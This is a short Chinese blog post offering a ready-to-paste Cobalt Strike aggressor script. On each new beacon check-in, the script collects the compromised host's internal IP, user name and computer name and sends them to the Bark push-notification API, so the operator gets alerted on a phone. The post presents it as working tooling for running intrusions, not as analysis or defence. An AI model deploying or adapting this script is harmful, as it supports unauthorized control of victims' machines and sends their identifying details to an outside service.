Cobalt-Strike 上线bark通知

转自这位大佬的上线server酱提示，代码如下。个人感觉bark的适用性更好*(时效)
粘贴cna即可食用

# 循环获取所有beacon
on beacon_initial {

    sub http_get {
        local('$output');
        $url = [new java.net.URL: $1];
        $stream = [$url openStream];
        $handle = [SleepUtils getIOHandle: $stream, $null];

        @content = readAll($handle);

        foreach $line (@content) {
            $output .= $line . "\r\n";
        }
        
        println($output);
    }
    #获取ip、计算机名、登录账号
    $internalIP = replace(beacon_info($1, "internal"), " ", "_");
    $userName = replace(beacon_info($1, "user"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");
    
    #get一下Bark的链接
    $url = 'https://api.day.app/'你的key'/CobaltStrike上线提醒/%0A%0A他来了、他来了，他脚踏祥云走来了。%0A%0Aip:'.$internalIP.'%0A%0A用户名:'.$userName.'%0A%0A计算机名:'.$computerName;
    
    http_get($url);
    
}

本文链接：